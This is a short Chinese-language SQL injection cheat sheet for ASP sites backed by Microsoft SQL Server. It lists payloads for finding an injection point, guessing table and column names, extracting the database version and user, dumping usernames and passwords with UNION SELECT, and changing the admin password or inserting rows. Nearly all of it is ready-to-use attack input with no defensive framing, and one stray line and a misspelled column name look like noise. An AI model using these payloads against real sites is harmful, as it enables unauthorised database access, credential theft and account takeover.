判断有无注入点
; and 1=1 and 1=2
猜表一般的表的名称无非是admin adminuser user pass password 等..
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) ---判断是否存在admin这张表
获取数据库版本
and (select @@version)>0
获取当前数据库名
and db_name()>0
获取当前数据库用户名
and user>0
and user_name()='dbo'
猜解所有数据库名称
and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) <>0
猜解表的字段名称
and (Select Top 1 col_name(object_id('表名'),1) from sysobjects)>0
and (select top 1 asernaose from admin where id =1)>1
.asp?id=xx having 1=1 其中admin.id就是一个表名admin 一个列名id
.asp?id=xx group by admin.id having 1=1 可以得到列名
.asp?id=xx group by admin.id,admin.username having 1=1 得到另一个列名 页面要和表有联系
如果知道了表名和字段名就可以爆出准确的值
union select 1,2,username,password,5,6,7,8,9,10,11,12 from usertable where id=6
爆账号
union select min(username),1,1,1,.. from users where username > 'a'
依次循环爆其余的账号
union select min(username),1,1,1,.. from users where username > 'admin'
;begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+username+'/'+password from userstable where
username>@ret select @ret as ret into foo end
修改管理员的密码为123
.asp?id=××;update admin set password='123' where id =1
.asp?id=××;insert into admin(asd,..) values(123,..) –就能能往admin中写入123了
rebots.txt
猜解数据库中用户名表的名称
and (select count(*) from 数据库.dbo.表名)>0
若表名存在,则工作正常,否则异常